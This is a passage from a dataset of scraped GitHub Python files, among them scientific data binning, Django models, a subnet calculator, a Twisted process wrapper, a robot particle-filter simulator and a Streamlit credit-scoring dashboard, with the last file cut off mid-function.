np.digitize( alt1, bins=np.linspace(u,d,n) )\n #i2 = np.digitize( alt2, bins=np.linspace(u,d,n) )\n #i3 = np.digitize( alt3, bins=np.linspace(u,d,n) )\n\n # np.digitize returns the indices of the bins to which each element in alt* belongs.\n icon_n = len(bins_sims)\n i1 = np.digitize( alt1, bins=bins_sims )\n i2 = np.digitize( alt2, bins=bins_sims )\n i3 = np.digitize( alt3, bins=bins_sims )\n i4 = np.digitize( alt4, bins=bins_sims )\n\n alt1_list = [ [] for i in np.arange(icon_n) ]\n qv_flash_list = [ [] for i in np.arange(icon_n) ]\n qv_fish_list = [ [] for i in np.arange(icon_n) ]\n\n alt2_list = [ [] for i in np.arange(icon_n) ]\n qi_list = [ [] for i in np.arange(icon_n) ]\n\n alt3_list = [ [] for i in np.arange(icon_n) ]\n temp_list = [ [] for i in np.arange(icon_n) ]\n theta_list = [ [] for i in np.arange(icon_n) ]\n\n alt4_list = [ [] for i in np.arange(icon_n) ]\n RHi_list = [ [] for i in np.arange(icon_n) ]\n\n # Group values into these bins\n for elem_idx, group_idx in enumerate(i1):\n alt1_list[group_idx-1].append( alt1[elem_idx].item() )\n qv_flash_list[group_idx-1].append( qv_flash[elem_idx].item() )\n qv_fish_list[group_idx-1].append( qv_fish[elem_idx].item() )\n\n for elem_idx, group_idx in enumerate(i2):\n alt2_list[group_idx-1].append( alt2[elem_idx].item() )\n qi_list[group_idx-1].append( qi[elem_idx].item() )\n\n for elem_idx, group_idx in enumerate(i3):\n alt3_list[group_idx-1].append( alt3[elem_idx].item() )\n temp_list[group_idx-1].append( temp[elem_idx].item() )\n theta_list[group_idx-1].append( theta[elem_idx].item() )\n\n for elem_idx, group_idx in enumerate(i4):\n alt4_list[group_idx-1].append( alt4[elem_idx].item() )\n RHi_list[group_idx-1].append( rhice_flash[elem_idx].item() )\n\n # Calculate the statistics across all items in a bin if there are at least 5 such items\n temp_SC_stats = np.empty((3, icon_n))\n temp_SC_stats[:] = np.nan\n theta_SC_stats = np.empty((3, icon_n))\n theta_SC_stats[:] = np.nan\n qv_flash_SC_stats = np.empty((3, icon_n))\n qv_flash_SC_stats[:] = np.nan\n qv_fish_SC_stats = np.empty((3, icon_n))\n qv_fish_SC_stats[:] = np.nan\n qi_SC_stats = np.empty((3, icon_n))\n qi_SC_stats[:] = np.nan\n RHi_SC_stats = np.empty((3, icon_n))\n RHi_SC_stats[:] = np.nan\n\n ## This chunk of code is generally commented out as we only need to save\n ## the number of elements in a bin from the in-situ measurements once\n ## These number of elements are used in syn_traj_stats_fixed\n #temp_len = []\n #qv_flash_len = []\n #qi_len = []\n #theta_len = []\n #rhi_len = []\n #for i in np.arange(icon_n):\n # temp_len.append( int(len(temp_list[i])) )\n # qv_flash_len.append( int(len(qv_flash_list[i])) )\n # qi_len.append( int(len(qi_list[i])) )\n # theta_len.append( int(len(theta_list[i])) )\n # rhi_len.append( int(len(RHi_list[i])) )\n #\n ## The whole second set of trajectories (z ~ 22 km) are piled into the last bin.\n ## Remove this bin as we're interested in the vertical profile lower down.\n #temp_len[-1] = 0\n #qv_flash_len[-1] = 0\n #qi_len[-1] = 0\n #theta_len[-1] = 0\n #rhi_len[-1] = 0\n #np.save( basedir + 'output/Stratoclim_temp_len.npy', np.asarray(temp_len, dtype='i4') )\n #np.save( basedir + 'output/Stratoclim_qv_len.npy', np.asarray(qv_len, dtype='i4') )\n #np.save( basedir + 'output/Stratoclim_qi_len.npy', np.asarray(qi_len, dtype='i4') )\n #np.save( basedir + 'output/Stratoclim_theta_len.npy', np.asarray(theta_len, dtype='i4') )\n #np.save( basedir + 'output/Stratoclim_rhi_len.npy', np.asarray(rhi_len, dtype='i4') )\n ##\n\n for i in np.arange(icon_n):\n if (len(temp_list[i]) > 5):\n temp_SC_stats[0,i] = np.nanmean( temp_list[i] )\n temp_SC_stats[1,i] = np.nanmedian( temp_list[i] )\n temp_SC_stats[2,i] = np.nanstd( temp_list[i] )\n theta_SC_stats[0,i] = np.nanmean( theta_list[i] )\n theta_SC_stats[1,i] = np.nanmedian( theta_list[i] )\n theta_SC_stats[2,i] = np.nanstd( theta_list[i] )\n if (len(qv_flash_list[i]) > 5):\n qv_flash_SC_stats[0,i] = np.nanmean( qv_flash_list[i] )\n qv_flash_SC_stats[1,i] = np.nanmedian( qv_flash_list[i] )\n qv_flash_SC_stats[2,i] = np.nanstd( qv_flash_list[i] )\n if (len(qv_fish_list[i]) > 5):\n qv_fish_SC_stats[0,i] = np.nanmean( qv_fish_list[i] )\n qv_fish_SC_stats[1,i] = np.nanmedian( qv_fish_list[i] )\n qv_fish_SC_stats[2,i] = np.nanstd( qv_fish_list[i] )\n if (len(qi_list[i]) > 5):\n qi_SC_stats[0,i] = np.nanmean( qi_list[i] )\n qi_SC_stats[1,i] = np.nanmedian( qi_list[i] )\n qi_SC_stats[2,i] = np.nanstd( qi_list[i] )\n if (len(RHi_list[i]) > 5):\n RHi_SC_stats[0,i] = np.nanmean( RHi_list[i] )\n RHi_SC_stats[1,i] = np.nanmedian( RHi_list[i] )\n RHi_SC_stats[2,i] = np.nanstd( RHi_list[i] )\n\n return bins_sims, temp_SC_stats, theta_SC_stats, qv_flash_SC_stats, qv_fish_SC_stats, qi_SC_stats, RHi_SC_stats\n\n\n# Utility function to retain only the whole-second measurements in the StratoClim data.\ndef trimDataTime():\n from netCDF4 import num2date, Dataset\n import xarray as xr\n import matplotlib.pyplot as plt\n import sys, time\n\n basedir = '/xdisk/sylvia/tropic_vis/obs/'\n fi = basedir + 'stratoclim2017.geophysika.0808_1.master.ci_eval.nc'\n Stratoclim = Dataset(fi, 'r+')\n\n daten = num2date(times=Stratoclim.variables['time'][:],units='seconds since 2000-01-01 00:00:00 UTC')\n # indices to retain associated with whole-second measurements\n indx = [i for i, d in enumerate(daten) if d.microsecond == 0]\n\n # recast Stratoclim as an xarray dataset now; Stratoclim2 will hold only whole-second measurements\n Stratoclim = xr.open_dataset(fi)\n Stratoclim2 = xr.Dataset()\n\n # iterate over the variables in the StratoClim file\n for v in Stratoclim.variables:\n Stratoclim2[v] = Stratoclim[v].isel(time=indx)\n Stratoclim2.to_netcdf(basedir + 'stratoclim2017.geophysika.0808_1.filtered_per_sec.nc')\n\n","repo_name":"sylviasullivan/ice-microp-rad","sub_path":"traj/flighttrack.py","file_name":"flighttrack.py","file_ext":"py","file_size_in_byte":9488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33952979137","text":"from __future__ import unicode_literals\n\nfrom django.core.exceptions import ValidationError\n\nfrom django.db import models\nfrom django.contrib.auth.models import User\n\nimport datetime\n\nclass Trip(models.Model):\n\tuser = models.ForeignKey(User, on_delete=models.CASCADE)\n\tlocation = models.CharField(max_length=100)\n\tdescription = models.CharField(max_length=255)\n\tstart_date = models.DateField()\n\tend_date = models.DateField()\n\tcreated_at = models.DateTimeField(auto_now=True)\n\tupdated_at = models.DateTimeField(auto_now_add=True)\n\nclass Traveler(models.Model):\n\tTraveler_id = models.ForeignKey(User)\n\tTrip_id = models.ForeignKey(Trip)\n\ndef clean_date(date, checkdate=datetime.date.today()):\n\n if not isinstance(date, datetime.date):\n \tdate = datetime.datetime.strptime(date, '%Y-%m-%d').date()\n \n\n if date < checkdate:\n raise ValidationError(\"You cannot travel into the past. because rules\")\n \n return date","repo_name":"davidhorst/TravelPlanning","sub_path":"apps/trips/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70912467309","text":"import csv\nimport cmath\nwith open(\"D:\\\\jeshmi\\\\csv_files\\\\quaddata.csv\",\"r\") as file:\n data =list(csv.reader(file))\n for row in data:\n A,B,C=row\n print(row)\n d = ((B**2)-4*A*C)\n if d>0:\n r1=(-B-cmath.sqrt(d))/(2*A) \n r2=(-B+cmath.sqrt(d))/(2*A)\n print(\"root1=\",r1)\n print(\"root2=\",r2)\n elif d==0:\n r=-B/2*A\n print(\"root=\",r)\n else:\n print(\"No root\")\n","repo_name":"jeshmi-hub/Python","sub_path":"quadata.py","file_name":"quadata.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14825454377","text":"\n# package twisted\nfrom twisted.internet import reactor\nfrom twisted.internet.protocol import ProcessProtocol\n \nimport sys\nimport os\nimport threading \nimport time\nfrom buildtools.bt_logging import log\nimport buildtools.os_utils as os_utils\n\nclass _PipeReader(ProcessProtocol):\n\n def __init__(self, asc, process, stdout_callback, stderr_callback, exit_callback):\n self._asyncCommand = asc\n self._cb_stdout = stdout_callback\n self._cb_stderr = stderr_callback\n self._cb_exit = exit_callback\n self.process = process\n\n self.buf = {\n 'stdout': '',\n 'stderr': ''\n }\n self.debug = False\n\n def _processData(self, bid, cb, data):\n if self.debug:\n log.info('%s %s: Received %d bytes', self._logPrefix(), bid, len(data))\n for b in data:\n if b != '\\n' and b != '\\r' and b != '':\n self.buf[bid] += b\n else:\n buf = self.buf[bid].strip()\n if self.debug:\n log.info('buf = %r', buf)\n if buf != '':\n cb(self._asyncCommand, buf)\n self.buf[bid] = ''\n\n def _getRemainingBuf(self):\n return self.buf['stdout'] + self.buf['stderr']\n\n def outReceived(self, data):\n self._processData('stdout', self._cb_stdout, data)\n\n def errReceived(self, data):\n self._processData('stderr', self._cb_stderr, data)\n\n def _logPrefix(self):\n return '[{}#{}]'.format(self._asyncCommand.refName, self.transport.pid)\n\n def inConnectionLost(self):\n log.warn('%s Lost connection to stdin.', self._logPrefix())\n\n def errConnectionLost(self):\n log.warn('%s Lost connection to stderr.', self._logPrefix())\n\n def processEnded(self, code):\n self._asyncCommand.exit_code = code\n self._cb_exit(code, self._getRemainingBuf())\n\n\nclass ReactorManager:\n instance = None\n\n @classmethod\n def Start(cls):\n if cls.instance is None:\n cls.instance = threading.Thread(target=reactor.run, args=(False,))\n cls.instance.daemon = True\n cls.instance.start()\n log.info('Twisted Reactor started.')\n\n @classmethod\n def Stop(cls):\n reactor.stop()\n log.info('Twisted Reactor stopped.')\n\n\nclass AsyncCommand(object):\n\n def __init__(self, command, stdout=None, stderr=None, echo=False, env=None, PTY=False, refName=None, debug=False):\n \n self.echo = echo\n self.command = command\n self.PTY = PTY\n self.stdout_callback = stdout if stdout is not None else self.default_stdout\n self.stderr_callback = stderr if stderr is not None else self.default_stderr\n\n self.env = os_utils._cmd_handle_env(env)\n self.command = os_utils._cmd_handle_args(command)\n\n self.child = None\n self.refName = self.commandName = os.path.basename(self.command[0])\n if refName:\n self.refName = refName\n\n self.exit_code = None\n self.exit_code_handler = self.default_exit_handler\n\n self.log = log\n\n self.pipe_reader = None\n self.debug = debug\n\n def default_exit_handler(self, code, remainingBuf):\n if code != 0:\n if code < 0:\n strerr = '%s: Received signal %d' % (abs(self.child.returncode))\n if code < -100:\n strerr += ' (?!)'\n self.log.error(strerr, self.refName)\n else:\n self.log.warning('%s exited with code %d: %s', self.refName, remainingBuf)\n else:\n self.log.info('%s has exited normally.', self.refName)\n\n def default_stdout(self, ascmd, buf):\n ascmd.log.info('[%s] %s', ascmd.refName, buf)\n\n def default_stderr(self, ascmd, buf):\n ascmd.log.error('[%s] %s', ascmd.refName, buf)\n\n def Start(self):\n if self.echo:\n self.log.info('[ASYNC] $ \"%s\"', '\" \"'.join(self.command))\n pr = _PipeReader(self, self.child, self.stdout_callback, self.stderr_callback, self.exit_code_handler)\n pr.debug = self.debug\n self.child = reactor.spawnProcess(pr, self.command[0], self.command[1:], env=self.env, usePTY=self.PTY)\n if self.child is None:\n self.log.error('Failed to start %r.', ' '.join(self.command))\n return False\n ReactorManager.Start()\n return True\n\n def Stop(self):\n process = os_utils.find_process(self.child.pid)\n if process:\n process.terminate()\n\n def WaitUntilDone(self):\n while self.IsRunning():\n time.sleep(1)\n return self.exit_code\n\n def IsRunning(self):\n return self.exit_code is not None\n\ndef async_cmd(command, stdout=None, stderr=None, env=None):\n ascmd = AsyncCommand(command, stdout=stdout, stderr=stderr, env=env)\n ascmd.Start()\n return ascmd","repo_name":"N3X15/python-build-tools","sub_path":"buildtools/twisted_utils.py","file_name":"twisted_utils.py","file_ext":"py","file_size_in_byte":4886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41097229021","text":"from __future__ import annotations\nfrom .base_dao import BaseDAO\nfrom typing import TYPE_CHECKING\nif TYPE_CHECKING:\n from dto import FormatsDTO\n\n\nclass FormatDAO(BaseDAO):\n def create(self, data: FormatsDTO) -> None:\n \"\"\"Executes data writing to a sqlite table.\"\"\"\n self._db_gateway.cursor.execute(\n 'INSERT INTO formats (format_name) VALUES (?);', (\n data.format_name, ))\n self._db_gateway.connection.commit()\n\n def get_ids_list(self) -> list[int]:\n \"\"\"Gets ids from sqlite table.\"\"\"\n result = self._db_gateway.cursor.execute(\n 'SELECT format_id FROM formats;')\n final_result: list[int] = result.fetchall()\n return final_result\n","repo_name":"Kosalexx/Project_1","sub_path":"book_store_db/populate_db/data_access/dao/formats.py","file_name":"formats.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20742663449","text":"\"\"\"\nprint(ip.ip_address(ip_input))\nnet4 = ip.ip_network(f'{ip_input}/{sub_mask}', strict=False)\nnetwork_addr = ip.ip_interface(f'{ip_input}/{sub_mask}')\nprint(network_addr.network)\nprint(net4.netmask)\nprint(net4.hostmask)\nprint(net4.num_addresses)\nprint(net4[1])\nprint(net4[-1])\n#for x in net4.hosts():\n#\tprint(x)\n\"\"\"\n\nip = input(\"Enter the ip address\")\nsubmask = input(\"Enter the submask\")\nnet_bin = []\n\ndef cidr_to_netmask(cidr): ## convert 24 to binary subnet mask\n\tcidr = int(cidr)\n\tmask = (0xffffffff >> (32 - cidr)) << (32 - cidr)\n\treturn (str( (0xff000000 & mask) >> 24) + '.' + str( (0x00ff0000 & mask) >> 16) + '.' + str( (0x0000ff00 & mask) >> 8) + '.' + str( (0x000000ff & mask)))\n\ndef ip_to_binary(ip):\n\tbin_ip = '.'.join([bin(int(x)+256)[3:] for x in ip.split('.')])\n\treturn bin_ip\n\ndef bin_to_ip(bina):\n\tbin_ip= '.'.join(str(int(x, 2)) for x in net_bin)\n\treturn bin_ip\n\ndef network_address_generation(sub_split,ip_split):\n\tfor i in range(0,len(sub_split)):\n\t\tif sub_split[i] == \"11111111\":\n\t\t\tnet_bin.append(ip_split[i])\n\t\telse:\n\t\t\tnet_bin.append(\"00000000\")\n\treturn net_bin\t\n\ndef broadcast_address_gen(submask,network):\n\tflag =0\n\tfor i in range(0,len(submask)):\n\t\tfor j in range(0,len(submask[i])):\n\t\t\tif j == \"1\":\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tflag = 1\n\t\t\t\tbreak\n\t\tif flag == 1:\n\t\t\tbroad.append(\"\")\n\t\telse:\n\t\t\tbroad.append(network[i])\nbin_ip = ip_to_binary(ip)\nbin_meta = cidr_to_netmask(submask)\nbin_sub = ip_to_binary(bin_meta)\n\nip_split = bin_ip.split('.')\nsub_split = bin_sub.split('.')\nnet_bin = network_address_generation(sub_split,ip_split)\nnetwork_addr = bin_to_ip(net_bin)\n\nprint(bin_ip)\nprint(bin_sub)\nprint(network_addr)\n\nbroadcast_addr = broadcast_address_gen(sub_split,net_bin)\n\n\n\n","repo_name":"lekshmir80/IP_Projrct","sub_path":"manual_ip.py","file_name":"manual_ip.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5798651057","text":"import Particle\nimport math\n\nconnected = True\ntry:\n from gopigo import *\nexcept ImportError:\n connected = False\n\nimport sys\nimport time\n\n\nclass Robot:\n def __init__(self, _maze, _speed, _rotationSpeed): #give it a maze as input!\n \n self.maze = _maze\n ###Variables for robot###\n self.x = 5.0 #location, initiliased to zero as the robot initialy has no clue where it is\n self.y = 25.0\n self.orientation = 0.6*(math.pi/2) #[0, 2PI]\n self.prVirtual = Particle.Particle(self.x, self.y, self.orientation) #virtual location for when robot is not connected\n self.pr = Particle.Particle(self.x, self.y, self.orientation) #belief location\n self.pr.set_noise(5.0, 1.0, 1.0) # these are for movement and sense distribution\n \n self.speed = _speed; #Speed with which the robot moves forwards\n self.rotationSpeed = _rotationSpeed; #\n \n self.movement = [0,0] # stores the last movement [length moved, rotation]\n self.measurement = [0.0,0.0,0.0,0.0,0.0] #we can always re evaluate number of points here. DO NOT MAKE ANY HARD CODED LOOPS.\n \n #The following are hard coded values found from measurements of the precision of robot movement. Length of arrays to be determined\n self.moveVar = [0,0,0,0,0] #variance in distance actually moved\n self.moveMean = [0,0,0,0,0]\n self.moveOrientVar = [0,0,0,0,0] #variance in orientation when moving forward\n self.moveOrientMean = [0,0,0,0,0]\n self.orientVar = [0,0,0,0,0] #variance in orientation when rotating\n self.orientMean = [0,0,0,0,0]\n self.measurementVar = [0,0,0,0,0] #variance in orientation when rotating\n self.measurementMean = [0,0,0,0,0]\n self.measurementLimHigh = 1e10 #limit for measurement. Set to some desired value\n self.measurementLimLow = 0\n\n self.distFromSensorToRotCenter = 7.5 #cm\n\n \n\n def move(self):\n if connected:\n self.rotate(self.movement[1])\n self.drive(self.movement[0])\n else:\n self.simulateMove(self.movement[1],self.movement[0])\n return 0\n\n def drive(self, _distance):\n \"\"\"Moves the robot. postive values=forward, negative values=backward\"\"\"\n if connected:\n distance = _distance #cm INPUT\n speed = 160 #constant\n unitSpeed = 11.11 #Units/second CONSTANT\n cmPrUnit = 1.1483 #Constant\n\n unitDist = int(round(distance/cmPrUnit)) #Be careful with int and doubles\n sleepTime = unitDist/unitSpeed * 1.3\n\n set_speed(speed) \n enc_tgt(1,1,unitDist)\n if(_distance > 0):\n fwd()\n else:\n bwd()\n time.sleep(sleepTime)\n return 0\n\n def rotate(self, _angle):\n if abs(_angle) < 0.001:\n return 0\n \"\"\"Rotate robot. Be aware of sign of angle. We need to figure out if CW is positive\"\"\"\n if connected:\n if _angle < math.pi:\n fullCircle = 32 #units\n partsOfCircle = 2*math.pi/_angle #how big a part of a full circle is rotated. eg 90 degrees = 4\n sleeptime = 5 #CHANGE BY MEASURE!\n\n units = int(round(fullCircle/partsOfCircle))\n set_speed(80) #DO NOT CHANGS UNLESS NEW TESTS ARE MADE WITH ROBOT TO CHECK HOW MANY UNITS GO TO FULL CIRCLE\n enc_tgt(1,1,units)\n right_rot() #Choose whether it should be clockwise or counterclockwise\n time.sleep(sleepTime)\n else:\n angle = 2*math.pi-_angle\n fullCircle = 32 #units\n partsOfCircle = 2*math.pi/angle #how big a part of a full circle is rotated. eg 90 degrees = 4\n sleeptime = 5 #CHANGE BY MEASURE!\n\n units = int(round(fullCircle/partsOfCircle))\n set_speed(80) #DO NOT CHANGS UNLESS NEW TESTS ARE MADE WITH ROBOT TO CHECK HOW MANY UNITS GO TO FULL CIRCLE\n enc_tgt(1,1,units)\n left_rot() #Choose whether it should be clockwise or counterclockwise\n time.sleep(sleepTime)\n\n\n return 0\n\n def measure(self): \n \"\"\"Updates measurement[] with a series of measurements.\"\"\"\n if connected:\n angles = []\n sleepTime = 0.5 #Set time between measures (has to be there for the program to wait with the next command until rotation is done)\n '''calculate angles to measure'''\n for i in range(0, len(self.measurement)):\n angle = (len(self.measurement)-i-1) * math.pi / (len(self.measurement)-1) # calculates the angles for which the sensors measure\n angle %= 2*math.pi\n angles.append(int(round(angle*180/math.pi)))\n\n ''' perform measurement'''\n for i in range(0, len(self.measurement)):\n servo(angles[i])\n time.sleep(sleepTime)\n measurement = us_dist(15)\n if measurement > 150: #hardcoded, not pretty... But is a bit bigger than the diagnoal of the maze\n self.measurement[i] = -1\n else:\n self.measurement[i] = measurement \n else:\n self.measurement = self.simulateMeasurements()\n return self.measurement\n\n def updateBelief(self, _particleFilter): #updates x, y and rotation\n \"\"\"updates x, y and rotation\"\"\"\n return 0\n\n def findPath(self):\n \"\"\"Finds the shortest path out of the maze. \n No need to have maze as input as the maze is a variable for the robot\"\"\"\n return 0\n\n def rotateServo(self):\n \"\"\"this function might just be moved to be a part of the measure() function.\"\"\" \n return 0\n\n def simulateMeasurements(self):\n self.prVirtual.calcDistance(self.maze)\n return self.prVirtual.measurements\n\n def simulateMove(self,_angle,_distance):\n print(self.pr.x)\n self.pr.move(_angle,_distance,self.maze)\n self.prVirtual.move(_angle,_distance,self.maze)\n self.x = int(round(self.prVirtual.x))\n self.y = int(round(self.prVirtual.y))\n self.orientation = self.prVirtual.orientation\n print(self.pr.x)\n print(\"done here\")\n return 0\n\n def getSimulatedLocation(self):\n return self.prVirtual.getStateofParticle()\n\n def calculateMovementOnPath(self, _distance, _maze):\n if _distance == 0 or len(_maze.path) == 0:\n self.movement = [0,0]\n return\n\n\n path = _maze.path\n cellsToTravel = int(_distance/_maze.cellSize)\n\n startcellY = int(_maze.allNodes[path[len(path)-1]][0])\n startcellX = int(_maze.allNodes[path[len(path)-1]][1])\n \n\n if cellsToTravel > len(path):\n endCellY = int(_maze.allNodes[path[0]][0])\n endCellX = int(_maze.allNodes[path[0]][1])\n else:\n endCellY = int(_maze.allNodes[path[len(path)-cellsToTravel]][0])\n endCellX = int(_maze.allNodes[path[len(path)-cellsToTravel]][1])\n\n xDist = endCellX - startcellX\n yDist = endCellY - startcellY\n\n distance = pythagoras(endCellX-startcellX, endCellY-startcellY)\n orientation = math.atan2(-xDist,yDist)\n\n rotation = orientation - self.orientation\n self.movement = [distance,rotation]\n \n return 0\n\n def reset(self):\n self.pr.rayTracedNodes = {}\n self.measurement = []\n\n def updateBelief(self, _x, _y, _orient):\n self.pr.x = _x\n self.pr.y =_y\n self.pr.orientation = _orient\n\n def correct(self, _correctionDistance):\n '''corrects for the fact that there is distance between sensor and center of rotation'''\n self.pr.correct(self.maze.dimX, self.maze.dimY,_correctionDistance)\n self.prVirtual.correct(self.maze.dimX, self.maze.dimY, _correctionDistance)\n self.x = int(round(self.prVirtual.x))\n self.y = int(round(self.prVirtual.y))\n\n\n\ndef pythagoras(length1, length2):\n \"\"\"caulcates the hypothenuse length of a diagonal of a right angled triangle\"\"\"\n return math.sqrt(math.pow(length1,2) + math.pow(length2,2))\n\n\n\n\n\n\n'''\n#Variables\nx, y; #int\nfloat orientation;\nint speed, rotationSpeed;\nint[2] movement; #array of distance forward as well as rotation. \nfloat[] measurement; #array of measurements. Most likely of size 5\nMaze maze; #robot stores the maze in it's own memory\n\nfloat[] moveVar, moveMean, moveRotVar, moveRotMean; #normal Distribution values for moving forward/backward. Array so values for different speeds can be stored. These values are constants that we hard code. moveRotVar is for the expected rotation while moving forward/backward\nfloat[] rotVar, rotMean; #Normal distribution for rotation\nfloat[] measurementVar, measurementMean; #Normal distribution for measurement\n\nfloat measurementLimHigh,measurementLimLow; #hard coded limits for measurements\n\n#Functions\nvoid move(float distance); #postive values=forward, negative values=backward\nvoid rotate(float angle); #negative or positive values\nvoid measure(); #Updates measurement[] with a series of measurements.\nvoid updateBelief(Particlefilter particleFilter); #updates x, y and rotation\nvoid findPath() #Finds the shortest path out of the maze. No need to have maze as input as the maze is a variable for the robot\nvoid rotateServo() # this function might just be moved to be a part of the measure() function.\n'''","repo_name":"timonielsen/Robot-with-Particle-Filter","sub_path":"Robot.py","file_name":"Robot.py","file_ext":"py","file_size_in_byte":9534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28720237741","text":"\n# Given three ints, a b c, return true if one of them is 10 or more less than one of the others.\n\n\n# lessBy10(1, 7, 11) → true\n# lessBy10(1, 7, 10) → false\n# lessBy10(11, 1, 7) → true\n\n\ndef lessBy10(a,b,c):\n diff_ab = abs(a - b)\n diff_ac = abs(a - c)\n diff_bc = abs(b - c)\n \n if diff_ab >= 10 or diff_ac >= 10 or diff_bc >= 10:\n return True\n else:\n return False\n\nprint(lessBy10(1, 7, 11))\nprint(lessBy10(1, 7, 10))\nprint(lessBy10(11, 1, 7))","repo_name":"aamiriqbal071/CodingBat","sub_path":"Logic-1/lessBy10.py","file_name":"lessBy10.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37355866797","text":"from django.db import models\nfrom baseapp.models.timestamp import TimeStamp\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.core.validators import RegexValidator\nfrom allauth.account.signals import user_signed_up\nfrom django.dispatch import receiver\nfrom allauth.socialaccount.signals import social_account_added\n\nclass UserProfile(TimeStamp):\n\n \"\"\"\n This model is an extension of the User model that is inbuilt in django.\n It is connected to django User model with a OneToOneField.\n \"\"\"\n user = models.OneToOneField(User,related_name='user',on_delete=models.CASCADE)\n avatar = models.URLField(max_length=255,blank=True,null=True)\n phone_regex = RegexValidator(regex=r'^\\+?([0,7,8,9]{1})}?\\d{9,12}$',\n message=\"Phone number must be entered in the format: '9848281223'. Up to 11 digits allowed.\")\n\n phone_number = models.CharField(validators=[phone_regex],max_length=10,verbose_name='User phone number',null=True,blank=True)\n\n fb_profile = models.URLField(max_length=255,null=True,blank=True,default=None)\n gmail_profile = models.URLField(max_length=255,null=True,blank=True,default=None)\n stripe_id = models.CharField(max_length=255,null=True,blank=True,verbose_name='Customer Stripe ID')\n\n\n\n def __str__(self):\n return str(self.id)\n\n\nfrom django.conf import settings\nimport stripe\n\n@receiver(user_signed_up)\ndef create_user_profile(request,user,sociallogin=None,**kwargs):\n if sociallogin:\n new_user = User.objects.get(email=user.email)\n avatar_url = sociallogin.account.get_avatar_url()\n user_profile,created = UserProfile.objects.get_or_create(user=new_user,avatar=avatar_url)\n\n if not user_profile.stripe_id:\n stripe.api_key= settings.STRIPE_SECRET_KEY\n st_customer = stripe.Customer.create(\n name=new_user.first_name,\n email=new_user.email,\n )\n user_profile.stripe_id = st_customer.id\n user_profile.save()\n\n\n\n if sociallogin.account.provider =='google':\n new_user = User.objects.filter(email=user.email)[0]\n profile = UserProfile.objects.filter(user=new_user)[0]\n profile.gmail_profile = sociallogin.account.get_profile_url()\n profile.save()\n elif sociallogin.account.provider =='facebook':\n new_user = User.objects.filter(email=user.email)[0]\n profile = UserProfile.objects.filter(user=new_user)[0]\n print (\"url\",sociallogin.account.get_profile_url())\n profile.fb_profile = sociallogin.account.get_profile_url()\n profile.save()\n","repo_name":"raviarrow88/Django-ecommerce","sub_path":"website/customer/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12247213049","text":"import streamlit as st\nimport streamlit.components.v1 as components \nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n#import matplotlib\nfrom matplotlib.patches import Rectangle, FancyArrowPatch\nimport pickle\nimport shap\nfrom PIL import Image\nimport requests\nimport json\n\nfrom PIL import Image\nfrom io import BytesIO\n\n\nlogo=Image.open('Ressources/images/logo.png')\ngenre=Image.open('Ressources/images/genre.png')\nsummary_mean=Image.open('Ressources/images/summary_plot_mean.png')\nimportance=Image.open('Ressources/images/importance.png')\nsummary=Image.open('Ressources/images/summary_plot.png')\ntop10_feat=pickle.load(open('Ressources/datasets/top10_feat.pkl', 'rb'))\n#df0=pd.read_csv('df0.csv')\n#df1=pd.read_csv('df1.csv')\nbaseURL = \"http://127.0.0.1:5000\"\ntop9_feat=np.delete(top10_feat,-1)\n\n##########################Les fonctions utilisees#######################################\n#######################################################################################\n#def graph_imp():\n # ''' Representation des features importances \n # globales definies par le model de classification '''\n # test=imp.head(25)\n # feat=test.Features.values\n # fig, ax = plt.subplots()\n # \n # ax=test.plot.bar(x='Features', y='Importances', figsize=(10,5), legend=False, color=sns.color_palette())\n# fig=ax.figure\n #fig.suptitle(\"Best 25 general feature importances\",\n # size=20,\n # y=1.1)\n # return(fig)\n\ndef tachymetre(client_probability, best_th):\n ''' Representation de la probailite d'acceptation \n du credit d'un client donne par rapport au seuil '''\n fig, ax = plt.subplots(figsize=(4, 0.3))\n fig.suptitle(f\"Le score de defaut est : {client_probability*100:.2f} \",\n size=8,\n y=1.5)\n ax.add_patch(Rectangle((0, 0), width=best_th * 100, height=1, color='green'))\n ax.add_patch(Rectangle((best_th * 100, 0), width=100 - best_th * 100, height=1, color='red'))\n ax.add_patch(FancyArrowPatch((client_probability * 100, 1), (client_probability * 100, 0), mutation_scale=10))\n ax.set_xlim(0, 100)\n ax.set_ylim(0, 1)\n ax.set_xticks(range(0, 105, 10))\n ax.set_yticks([])\n \n return fig\n\n\ndef minmax_plt(df, feature, feat_disc):\n ''' Representation d'un curseur qui permet l'affichage de l'emplacement des info d'un client donne par rapport a l'intervall des valeurs'''\n client_feat=float(df.loc[feature].values)\n fig, ax = plt.subplots(figsize=(5, 1.5))\n fig.subplots_adjust(bottom=0.6)\n fig.suptitle(f'Valeur client pour feature {feature} est {client_feat:.3f}' ,\n size=10,\n y=1)\n cmap = (mpl.colors.ListedColormap(['firebrick','darkred','firebrick' ]))\n bounds = [feat_disc[0],feat_disc[1],feat_disc[3] ,feat_disc[4]]\n norm = mpl.colors.BoundaryNorm(bounds, cmap.N)\n fig.colorbar(\n mpl.cm.ScalarMappable(cmap=cmap, norm=norm),\n cax=ax,\n #extend='both',\n extendfrac='auto',\n ticks=[feat_disc[0],feat_disc[1], feat_disc[2],feat_disc[3],feat_disc[4]],\n spacing='uniform',\n orientation='horizontal',\n )\n \n ax.axvline(feat_disc[2], 